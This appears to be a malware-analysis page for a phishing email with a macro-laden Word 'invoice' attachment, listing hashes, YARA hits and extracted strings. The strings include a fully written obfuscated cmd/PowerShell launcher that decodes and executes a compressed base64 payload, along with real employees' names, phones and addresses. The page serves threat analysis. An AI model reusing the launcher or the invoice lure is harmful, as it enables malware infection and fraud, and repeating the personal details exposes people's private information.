Sample details: 7111dd17f0b4b979e28b92054f802875

Hashes
MD5: 7111dd17f0b4b979e28b92054f802875
SHA1: bc6b0a4f5844c72816675419c41de91fb6a13408
SHA256: 336a641689a9158d78ac61adc2b19b28cb468889bc4f726eaecd47c7e23756fc
SSDEEP: 768:+8mCbpMLwVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9/isfNMM3rHKS/8Fc:CCbS0ocn1kp59gxBK85fBt+a9dX2
Details
File Type: Composite
Added: 2018-11-12 00:51:28
Yara Hits
YRP/without_images | YRP/without_attachments | YRP/with_urls | YRP/powershell | YRP/office_document_vba | YRP/Contains_VBA_macro_code | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Misc_Suspicious_Strings | YRP/Big_Numbers0 | YRP/Big_Numbers1 | FlorianRoth/PowerShell_Case_Anomaly
Strings
		Saket Vijay Bhagat Invoice # OUI314523-940
spam_report
00000001
outlook.hmm21.com/o=Hyundai Group/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=user2c11fc2a
jihye.lee@hyundaimovex.com
Warm Regards
Sunil Kumar Singh
Dy Manager  , I&T  Mumbai
Hyundai Merchant Marine India Pvt. Ltd
Tel   :+91-22-6284 1170
Mobile : +91-9833897839
E-mail.   idsks@hmm21.com
-----Original Message-----
From: Saket Vijay Bhagat
Sent: Wednesday, November 7, 2018 9:27 PM
To: Sanjay Patel
Subject: Saket Vijay Bhagat Invoice # OUI314523-940
Please view the attached invoice.
I look foward to hearing from you.
Saket Vijay Bhagat
Phone (Business):
872 118-9259
Phone (FAX):
872 118-9057
e-Mail:insvb@hmm21.com
________________________________
* The information contained in this e-mail (including attachments) is confidential and is meant solely for the intended recipient. If you are not the intended recipient of this message please notify the sender and delete this email and any attachments from your system. HMM employs comprehensive anti-virus software, but is not responsible for viruses or other malware associated with any email sent from the Company
s systems. HMM recommends that recipients scan all file attachments. Note that any views or opinions reflected in this email are solely those of the author and do not necessarily represent those of the Company. In the event of any technical difficulty with this email and any attachments, please contact the sender or groupware@hmm21.com.
en-US, ko-KR
II=0101D476B2C0C6B655C2893019419F71B8288D20949DA5473AB120;SBMID=1;SBT=1;THA=2875388813;FIXUP=7.2984;Version=Version 14.3 (Build 158.0), Stage=H7
S-KR-ECS-02.hyundai.group
Internal
IPM.Note
sip:idsks@hmm21.com
idsks@hmm21.com
idsks@hmm21.com
idsks@hmm21.com
SUNIL KUMAR SINGH(HMM3560173)
SUNIL KUMAR SINGH(HMM3560173)
/o=Hyundai Group/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=Sunil Kumar Singh(hmm3560173)
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
Sunil Kumar Singh
<12156838835443817086.9E65D39A32CEC059@hmm21.com>
<12156838835443817086.9E65D39A32CEC059@hmm21.com>
<E32127775220D341BB4EFC9A625518100186D84675@S-KR-EMB-06>
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
EX:/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
Sunil Kumar Singh
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
<E32127775220D341BB4EFC9A625518100186D84675@S-KR-EMB-06>
Received: from S-KR-EMB-06.hyundai.group ([10.21.250.116]) by
 S-KR-ECS-02.hyundai.group ([203.242.43.8]) with mapi id 14.03.0158.001; Fri,
 9 Nov 2018 19:07:43 +0900
Content-Type: application/ms-tnef; name="winmail.dat"
Content-Transfer-Encoding: binary
From: Sunil Kumar Singh <idsks@hmm21.com>
To: spam_report <spam@hyundaimovex.com>
Subject: FW: Saket Vijay Bhagat Invoice # OUI314523-940
Thread-Topic: Saket Vijay Bhagat Invoice # OUI314523-940
Thread-Index: AQHUdrLAxrZVwokwGUGfcbgojSCUnaVHOrEg
Date: Fri, 9 Nov 2018 19:07:42 +0900
Message-ID: <E32127775220D341BB4EFC9A625518100186D84675@S-KR-EMB-06>
References: <12156838835443817086.9E65D39A32CEC059@hmm21.com>
In-Reply-To: <12156838835443817086.9E65D39A32CEC059@hmm21.com>
Accept-Language: en-US, ko-KR
Content-Language: en-US
X-MS-Has-Attach: yes
X-MS-Exchange-Organization-SCL: -1
X-MS-TNEF-Correlator: <E32127775220D341BB4EFC9A625518100186D84675@S-KR-EMB-06>
MIME-Version: 1.0
X-MS-Exchange-Organization-AuthSource: S-KR-ECS-02.hyundai.group
X-MS-Exchange-Organization-AuthAs: Internal
X-MS-Exchange-Organization-AuthMechanism: 04
X-Originating-IP: [172.23.15.170]
X-Auto-Response-Suppress: DR, OOF, AutoReply
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
Saket Vijay Bhagat Invoice # OUI314523-940
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
EX:/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
EX:/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
/Lee jihye
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
Sunil Kumar Singh
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SIN
GH(HMM3560173)
/Lee jihye
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=USER2C11FC2A
EX:/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SUNIL KUMAR SINGH(HMM3560173)
FW: Saket Vijay Bhagat Invoice # OUI314523-940
IPM.Note
2F3A5C27C0C41E4DB3D5E3ECB02D22F7@hyundai.group
application/msword
OUI314523-940.doc
OUI314~1.doc
OUI314523-940.doc
CMD C:\wINdows\systEM32\cMd   /c  "SEt   KQI= (nEW-oBJecT  SySTem.Io.StReaMReaDEr( ( nEW-oBJecT io.cOMPReSsion.DeFLAtEStReAm([iO.MEmORYstrEAm] [SyStEm.CONVeRT]::fROMBASe64STRing( 'PZBba8JAEIX/Sh4W1mDdVLBaXAK2FS8t2IpILfQlyY5mc9lJ48TYhvz3JlL7Ouc7H5xh0WbqGih76EcQkLUCEu/gPyUaDEk22ymXh0TZ2HF8jQRHEgEKrZyzWr3Ny9G6P/mL4yKNU98zqjCHhkmdWbZ4SdV+dwUIgtBgiahaRQzOcA63D/Hzqb++IgbwkGORCY3OcAuLox++/td1dswx9Iy+2DH5+hgNBlxsskRTh0+4Ldl2rS3X4vd3Ay4ZPZYuA3MaE6RZl3/ybpt3uYAzcLnHHLwg7LDoZ2VpY7VT7Yry74o1LxFTLE2CnprpBC7MjdUKbbk0J4yht2ykl4v0G08s68CjIKzq+hc=' ), [syStEM.iO.ComPReSsION.cOMPRESsIonMODe]::DeCoMPreSs) ) ,[TeXt.enCOdINg]::AsCII) ).REAdtOEnD( ) ^|^&( ([strIng]$verBOsEpreFeRence)[1,3]+'X'-JoiN'')&&   PoWErshELL      ^& ( \"{0}{1}\" -f'SET-ItE','m' )  ('Va'  +'RI'+ 'AbLE:jW1V') (    [tYpE](\"{1}{0}{2}\" -f'nVi','E','rONMENT')   )   ;    ^&(  ${En`V:`comS`PeC}[4,24,25]-join'' )(  (  (    . ( \"{1}{0}{2}{3}\" -f'-ch','gEt','IlDiT','EM'  )  (  'vA' + 'rI'+'aBle:jW1v' )  ).VALue::(  \"{3}{0}{1}{4}{6}{5}{2}\" -f 'Vir','On','BlE','gEten','Me','vaRIa','NT'  ).Invoke(  'kqi',( \"{0}{2}{1}\" -f 'pro','sS','CE' )  ) )  )"
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
theme/theme/_rels/themeManager.xml.rels
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
[Content_Types].xml
_rels/.rels
drs/e2oDoc.xml
drs/downrev.xmlL
[Content_Types].xmlPK
_rels/.relsPK
drs/e2oDoc.xmlPK
drs/downrev.xmlPK
Normal.dotm
Microsoft Office Word
Sophie-PC
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
vrMFYIKGfbR
Document_open
FormatDateTimeG
WkRAGZZ
hiIMwA;
YrhoOiN
cvKSzE
mELbqLl4
tQJsRj
FormatNumber/
UPRwWao
cMwKNLW
PjaVrm
jhNmwF
qtRvUVU)
tKVUc+
YiCclY0C
otiUFp
WoqSCs
YhCIPN
TimeValue
htuaKk}<
mSfPtA
cVZFBO
jUwVsr
CJzWUK
zwsmSI
TtFcAJ
LHosMd
FAvqK7b
BcTIujmj
SMkQNQChwj
ShellV
Shapes
BLdIhjrw:
IjzqazhQ
TextFrame
TextRange
iJCzhULb
lCYncjX
TBEapTw
aMoPSS
OkRKrw
jSUdQq
pZMiiM
SjEmTI
jSDRjs.
pjiKj&
VwXhzu
oCBSSw
SVLWWu
pmjIYK
SGASKV
TiZpob
NqHia0
Mjkujb
kVQUkW
XNthOs
Project
ThisDocument
Project
vrMFYIKGf
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
C:\Windows\system32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
Document
Document_open
vrMFYIKGf
ID="{3EBC5840-0B52-4169-89D9-94B386BE262E}"
Document=vrMFYIKGf/P
&H00000000
ExeName32="FQzpzbZWJ"
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="1311D8B545B945B945B945B9"
DPB="7C7EB72049884A884A88"
GC="E5E72EDBFE45FF45FFBA"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
vrMFYIKGf=0, 0, 0, 0, C
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Normal.dotm
Microsoft Office Word
Sophie-PC
/o=Hyundai Group/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=spam_report[mal.spam]cac
spam_report
spam@hyundaimovex.com
EX:/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=SPAM_REPORT[MAL.SPAM]CAC
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=Spam_report[mal.spam]cac
spam_report
/O=HYUNDAI GROUP/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=Spam_report[mal.spam]cac